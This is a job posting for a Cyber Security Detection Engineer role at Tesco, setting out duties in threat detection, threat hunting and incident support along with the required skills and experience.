As a Cyber Security Detection Engineer, you will lead the development, implementation, and continuous improvement of Tesco's cyber security detection capability. You will be required to understand the changing threat landscape, identify opportunities for improvement, establish new detections, and ensure comprehensive detection coverage for the organization. You will work closely with security operations, engineering, and risk & compliance teams in a fast-paced, agile environment.
Responsibilities include developing and driving the cyber security detection capability both operationally and strategically for the Tesco Group. You should design effective detection logic, ensure detections are robust and thoroughly tested, and make alerts and supporting information accessible and understandable to operational cyber security teams.
You will prioritize the needs of incident responders and operational teams, ensuring detections and alerts are relevant and actionable. The detection capability must be adaptable for on-premises, private, and public cloud environments, operating at scale across diverse asset types.
You may also support cyber security incidents, participate in threat hunts, and collaborate with other security teams to automate processes and standardize responses.
Security Engineering Skills
* Threat Led: Ability to assess and validate threat information, analyze trends, threat actor TTPs, and translate intelligence into actionable data.
* Secure & Test-Driven Engineering: Knowledge of cyber security frameworks (MITRE ATT&CK, Lockheed Martin Kill Chain), secure development lifecycle, detection development, code review, and vulnerability assessment.
* Research: Ability to define research goals, generate detection ideas, and communicate findings effectively.
Relevant Experience
* Developing queries for threat detection.
* Knowledge of Windows, macOS, or Linux OS.
* Ability to work independently and in teams.
* Understanding attacker TTPs and translating threat intelligence into detection logic.
* Proficiency with detection technologies and scripting languages (e.g., KQL, SPL, Python, PowerShell).
Desirable Skills
* Knowledge of cloud infrastructure, security, and APIs.
* Experience with offensive security tools and techniques.
* Development of detections as code.
#J-18808-Ljbffr